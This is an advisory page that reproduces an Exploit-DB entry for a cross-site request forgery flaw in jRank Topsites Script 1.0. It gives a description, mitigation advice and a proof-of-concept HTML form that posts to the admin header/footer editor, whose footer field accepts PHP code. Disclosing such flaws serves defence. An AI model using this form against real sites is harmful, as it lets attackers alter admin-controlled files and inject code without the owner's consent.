jRank - Topsites Script 1.0 - Cross-Site Request Forgery

vendor:

jRank Topsites Script

by:

Ihsan Sencan

7,8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: jRank Topsites Script

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:topsitesscript:jrank_topsites_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2017

jRank – Topsites Script 1.0 – Cross-Site Request Forgery

jRank Topsites Script version 1.0 is vulnerable to Cross-Site Request Forgery (CSRF). An attacker can exploit this vulnerability to perform administrative actions on behalf of the administrator. This can be done by tricking the administrator into clicking a malicious link or visiting a malicious website. The malicious website can contain a crafted HTML form with hidden parameters that will be automatically submitted to the vulnerable application. This can be used to perform administrative actions such as creating a new user, changing the administrator's password, etc.

Mitigation:

The application should implement a CSRF protection mechanism to prevent attackers from exploiting this vulnerability. This can be done by implementing a unique token in the HTML form that is generated for each user session.

Source

Exploit-DB raw data:

<!--
# # # # # 
# Exploit Title: jRank - Topsites Script 1.0 - Cross-Site Request Forgery
# Dork: N/A
# Date: 10.09.2017
# Vendor Homepage: https://topsitesscript.com/
# Software Link: https://topsitesscript.com/topsites-script-demo/
# Demo: http://www.topsitesscript.com/demo/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
-->
<form action="http://localhost/[PATH]/admin/headerfooter.php" method="post">
<input name="action" value="edit" type="hidden">
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Meta Tags File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<textarea cols="10" rows="2" name="meta" style="width: 100%">
<!-- 
Html Code etc.....
-->
</textarea>
</td>
</tr>
</tbody>
</table>
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Footer File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td><textarea cols="60" rows="7" name="footer" style="width: 100%">
<!--
Php Code etc.....
-->
</textarea>
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<font face="verdana" size="2"><center><input name="submit" value="Edit" type="submit"></center></font>
</td>
</tr>
</tbody>
</table>
</form>